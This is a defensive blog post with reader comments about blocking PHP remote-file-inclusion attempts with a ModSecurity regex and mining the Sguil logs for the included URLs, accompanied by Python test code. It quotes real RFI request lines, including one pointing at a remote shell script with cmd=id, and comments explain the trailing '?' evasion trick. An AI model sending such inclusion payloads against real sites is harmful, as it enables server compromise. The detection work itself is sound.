Running a PHP based blog, I see a lot of attempts to make the scripts include code hosted elsewhere (remote file inclusion, RFI). A long time ago I added a simple rule to block one type of these attempts. A typical attempt looks like this:
GET /blog/category/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1
Notice the trailing question marks? It turns out these are always present, so they are very easy to block on. I have been doing that for a long time now and have never seen a single false positive. The rule looks like this:
SecRule ARGS:/.*/ "https?.*\?$" "msg:'LOCAL PHP ? link code inclusion attempt',severity:1,phase:1"
This rule looks at all request arguments and checks whether a value contains http or https and ends with a question mark. If so, the request is blocked. A few details matter when copying it. The question mark has to be escaped in the regex: an unescaped "?" after ".*" is a lazy quantifier, so "https?.*?$" would match any argument value that merely contains http. The rule carries no disruptive action of its own, so whether a match actually blocks depends on the SecDefaultAction in effect. With phase:1 only query-string arguments are inspected, because the request body has not been read yet; the same check on POST parameters needs a phase:2 rule. ModSecurity 2.7 and later also require an id: action on every rule.
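The following check is an added example, not code from the original post. It runs the two spellings of the regex, the unescaped "https?.*?$" and the escaped "https?.*\?$", over a few constructed query strings the way ARGS:/.*/ applies a rule to every argument value, so the false positive of the unescaped form shows up directly. It also models, as an assumption not taken from the post, a vulnerable include of the shape include($_GET['page'] . '/footer.php') to show why the trailing "?" is such a reliable indicator: the locally appended suffix lands in the query string of the attacker's URL.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed query strings (not taken from the original post's logs):
# two RFI-style values with a trailing "?", one legitimate link argument,
# and one ordinary request.
SAMPLES = {
    "rfi":        "page=http://www.djrady.ru/includes/conf.txt??",
    "rfi_https":  "page=https://203.0.113.5/images/logo.jpg?",
    "legit_link": "url=http://example.com/some/page&id=3",
    "plain":      "page=about&id=3",
}

# Unescaped: the "?" after ".*" is a lazy quantifier, so this matches any
# value that contains "http" anywhere.
RULE_UNESCAPED = re.compile(r"https?.*?$")
# Escaped: requires a literal "?" as the last character of the value.
RULE_ESCAPED = re.compile(r"https?.*\?$")


def rule_matches(rule, query_string):
    """Apply a rule to every argument value, as ARGS:/.*/ does in ModSecurity.
    Returns the first offending value, or None if the request is clean."""
    for _name, value in parse_qsl(query_string, keep_blank_values=True):
        if rule.search(value):
            return value
    return None


def false_positives(rule, samples):
    """Names of the non-attack samples a rule would block."""
    return [name for name, qs in samples.items()
            if not name.startswith("rfi") and rule_matches(rule, qs)]


def remote_fetch(page_value, local_suffix="/footer.php"):
    """Model an assumed vulnerable include such as
    include($_GET['page'] . '/footer.php') (not code from the post).
    Returns the host, path and query the server would request from the
    attacker's host: because of the trailing "?", the locally appended
    suffix ends up in the query string, which the remote script ignores."""
    parts = urlsplit(page_value + local_suffix)
    return parts.netloc, parts.path, parts.query


if __name__ == "__main__":
    for label, rule in (("unescaped", RULE_UNESCAPED), ("escaped", RULE_ESCAPED)):
        hits = [n for n, qs in SAMPLES.items() if rule_matches(rule, qs)]
        print(f"{label:9s} blocks {hits}, false positives {false_positives(rule, SAMPLES)}")
    print(remote_fetch("http://www.djrady.ru/includes/conf.txt??"))
```

The unescaped rule blocks the legitimate url= argument as well; the escaped one blocks only the two values that end in a question mark.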
Today I was thinking that the URIs being included probably contain some badness, and it would be interesting to look at what all the URIs are. Using modsec2sguil I am adding all ModSecurity events to Sguil, so this was going to be an interesting MySQL challenge!
The query I came up with is this:
SELECT COUNT(*) AS cnt,
       INET_NTOA(src_ip) AS "Source IP",
       TRIM(LEADING '=' FROM SUBSTRING_INDEX(SUBSTR(UNHEX(data_payload), LOCATE('=http', UNHEX(data_payload))), '?', 1)) AS url
FROM event
INNER JOIN data ON event.sid = data.sid AND event.cid = data.cid
WHERE timestamp >= '2009-01-13'
  AND signature LIKE 'MSc 403 LOCAL PHP ?%'
GROUP BY src_ip, url
ORDER BY cnt DESC
LIMIT 10;
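To make the string surgery in that query easier to follow, here is the same extraction and aggregation in Python, added here as an example rather than anything from the post or from Sguil. It assumes what the query itself assumes: src_ip is stored as the 32-bit integer INET_NTOA converts back, and data_payload is the hex-encoded request that UNHEX decodes. The rows are constructed, not real events. Note the edge case the query inherits from SUBSTRING_INDEX: an included URL that carries its own query string is cut at its first "?", so only the path survives in the url column.

```python
from collections import Counter
from ipaddress import ip_address

SIGNATURE = "MSc 403 LOCAL PHP ? link code inclusion attempt"


def make_row(timestamp, src_ip, signature, request):
    """One constructed row of the event/data join: src_ip as the 32-bit
    integer Sguil stores (what INET_NTOA converts back), data_payload as
    the hex-encoded request (what UNHEX decodes)."""
    return {
        "timestamp": timestamp,
        "src_ip": int(ip_address(src_ip)),
        "signature": signature,
        "data_payload": request.encode().hex(),
    }


# Constructed sample rows, not real Sguil data. Addresses come from the
# documentation ranges; the remote hosts other than the one in the post are invented.
SAMPLE_ROWS = [
    make_row("2009-01-14 03:12:09", "198.51.100.10", SIGNATURE,
             "GET /blog/category/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
    make_row("2009-01-14 03:12:11", "198.51.100.10", SIGNATURE,
             "GET /blog/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
    make_row("2009-01-15 22:40:01", "198.51.100.10", SIGNATURE,
             "GET /blog/category/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
    make_row("2009-01-15 22:41:37", "198.51.100.10", SIGNATURE,
             "GET /blog/index.php?page=http://203.0.113.7/images/logo.jpg?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
    # The included URL has its own query string; SUBSTRING_INDEX cuts at the
    # first "?", so the cmd parameter is lost in the extracted url column.
    make_row("2009-01-16 08:05:55", "192.0.2.44", SIGNATURE,
             "GET /index.php?page=http://203.0.113.7/sh.txt?cmd=id?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
    # A different signature and an event before the date cut-off: both filtered out.
    make_row("2009-01-16 08:06:02", "192.0.2.44", "MSc 403 Generic attack",
             "GET /index.php?page=http://203.0.113.7/sh.txt?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
    make_row("2009-01-12 11:00:00", "198.51.100.10", SIGNATURE,
             "GET /blog/index.php?page=http://198.51.100.200/old.txt?? HTTP/1.1\r\nHost: blog.example\r\n\r\n"),
]


def extract_url(payload_hex):
    """Python equivalent of the query's url expression:
    TRIM(LEADING '=' FROM SUBSTRING_INDEX(SUBSTR(UNHEX(p), LOCATE('=http', UNHEX(p))), '?', 1))."""
    payload = bytes.fromhex(payload_hex).decode("latin-1")   # UNHEX
    start = payload.find("=http")                              # LOCATE
    if start == -1:            # LOCATE returns 0 and SUBSTR(..., 0) is ''
        return ""
    head = payload[start:].split("?", 1)[0]                    # SUBSTR + SUBSTRING_INDEX
    return head.lstrip("=")                                    # TRIM(LEADING '=')


def top_urls(rows, since="2009-01-13", sig_prefix="MSc 403 LOCAL PHP ?", limit=10):
    """The WHERE / GROUP BY src_ip, url / ORDER BY cnt DESC / LIMIT part.
    ISO timestamps compare correctly as strings, like MySQL's datetime compare."""
    counts = Counter()
    for row in rows:
        if row["timestamp"] < since or not row["signature"].startswith(sig_prefix):
            continue
        counts[(row["src_ip"], extract_url(row["data_payload"]))] += 1
    ranked = sorted(counts.items(), key=lambda item: (-item[1], item[0]))
    return [(cnt, str(ip_address(ip)), url) for (ip, url), cnt in ranked[:limit]]


if __name__ == "__main__":
    for cnt, ip, url in top_urls(SAMPLE_ROWS):
        print(f"{cnt:4d}  {ip:15s}  {url}")
```

If the truncation matters for your reporting, split on the double "??" marker instead of the first "?"; the query above deliberately keeps the simpler rule.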
The result is shown in the picture (the full picture is linked from the original post):
I get about 10 URLs like this a day, and usually each is tried more than once. So what is at these links? The first one gave a 404, so let's look at the second one. It's a .jpg, so that's a picture, right? Wrong!
I downloaded the file and opened it in vim. As you can see in this fragment, this is PHP code…
Does anyone know of a place where I can report these URLs on a daily or weekly basis?
Nice post, Victor.
You can report the sites to Google: http://www.google.com/safebrowsing/report_badware/
OpenDNS has domain tagging, but it does not appear to include malicious sites. The closest thing I see is an ‘adware’ tag: http://www.opendns.com/community/domaintagging/about/
I have added this to my list of ModSecurity rules at http://www.xiom.com/signatures-modsecurity. Do you know why the URL ends with a "?"?
Ofer said: Do you know why the URL ends with a "?"?
It is a technique somewhat similar to SQL Injection payloads utilizing comment specifiers (-- or ;-- or #) at the end of their payloads. The RFI attackers do not know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the "?" character, the remainder of the local server PHP code is actually treated as a parameter to the RFI included code. The injected RFI PHP code simply ignores the parameter data so it will only execute its own code.
Thanks for that explanation Ryan. Do you see any danger of false positives when blocking request URIs ending in a "?"? On my WordPress blog I've not seen any FP so far…
Thanks for the very useful information. Do you know why the URL ends with a “?”
@Adam, see Ryan Barnett’s explanation above!
I have a question because I don't understand:
SecRule ARGS:/.*/ "https?.*?$" "msg:'LOCAL PHP ? link code inclusion attempt',severity:1,phase:1"
In the above method, why don't you use "http?.*?$" instead of "https?.*?$"?
Without the letter "s" and with the letter "s".
Sorry, my English is not good.
The s? in https? means that it will match on http or https. In your example it would match on htt or http.